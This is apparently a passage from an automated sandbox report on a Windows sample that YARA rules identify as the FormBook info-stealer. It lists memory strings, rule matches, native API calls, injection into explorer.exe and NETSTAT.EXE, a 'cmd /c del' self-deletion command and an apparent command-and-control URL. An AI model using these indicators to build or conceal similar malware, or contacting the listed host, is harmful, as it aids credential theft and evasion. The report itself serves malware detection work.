          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnAc
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641381052.0000000005529000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnUc
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krklJ
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.krylx
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.639209828.0000000005542000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coml
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr.kr
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr8l
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.640398175.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.krbl
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comicFf
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641852644.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comicwf
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.723822115.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000003.641678257.0000000005525000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cnue
          Source: NETSTAT.EXE, 0000000A.00000002.903760107.0000000003AC2000.00000004.00000001.sdmpString found in binary or memory: https://www.updates-app.com/4nn8/?Hdydvr=ihdw70LkX5hxMDN4QIP96

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004181B0 NtCreateFile,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00418260 NtReadFile,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004182E0 NtClose,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00418390 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_004181AC NtCreateFile,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00418202 NtCreateFile,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041840A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0347B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03479820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_009681B0 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_009682E0 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00968260 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00968390 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_009681AC NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00968202 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096840A NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B84A
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00401030
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00408C4C
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00408C50
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B496
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041CD52
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041C514
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041C527
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00402D88
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00402D90
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041CDA7
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041CE79
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041BE0B
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041CF31
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00402FB0
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0049BF7F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0346EBB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03456E30
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03501D55
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0343F900
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03430D20
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03454120
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344D5E0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_03462581
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_034F1002
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344841F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0344B090
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B496
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00958C50
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00958C4C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00952D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00952D88
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096CDA7
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096C514
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096C527
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096CD52
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096CE79
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00952FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096CF31
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: String function: 0343B150 appears 32 times
          Source: NQBNpLezqZKv1P4.exe, 00000000.00000000.636900304.0000000000102000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exeBinary or memory string: OriginalFilename vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000003.697053653.0000000000DD6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamenetstat.exej% vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exe, 00000004.00000000.696683735.0000000000492000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exeBinary or memory string: OriginalFilenameFixedBufferAttribu.exe8 vs NQBNpLezqZKv1P4.exe
          Source: NQBNpLezqZKv1P4.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.NQBNpLezqZKv1P4.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902524326.0000000000B80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902331087.0000000000950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.902873403.0000000002F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.771627554.00000000009D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.772293876.0000000000AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.771173980.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: NQBNpLezqZKv1P4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: NQBNpLezqZKv1P4.exe, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
          Source: 0.0.NQBNpLezqZKv1P4.exe.100000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.0.NQBNpLezqZKv1P4.exe.490000.0.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
          Source: 4.2.NQBNpLezqZKv1P4.exe.490000.1.unpack, ControlePorTwitter/Business/Seguranca.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@7/6
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NQBNpLezqZKv1P4.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6324:120:WilError_01
          Source: NQBNpLezqZKv1P4.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess created: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NQBNpLezqZKv1P4.exe'
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: NQBNpLezqZKv1P4.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: NQBNpLezqZKv1P4.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772592916.0000000000BCA000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000A.00000002.903338998.000000000352F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: NQBNpLezqZKv1P4.exe, 00000004.00000002.772737202.0000000000FF0000.00000040.00000001.sdmp, NETSTAT.EXE
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.715863977.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041522D push esi; retf
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_0040F646 push edi; retf
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00415628 push ss; iretd
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeCode function: 4_2_00414E32 push ds; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0348D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096522D push esi; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B3FB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0096B45C push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00964E32 push ds; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_00965628 push ss; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 10_2_0095F646 push edi; retf
          Source: initial sampleStatic PE information: section name: .text entropy: 7.57888986763
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\NQBNpLezqZKv1P4.exeProcess information set: NOOPENFILEERRORBOX
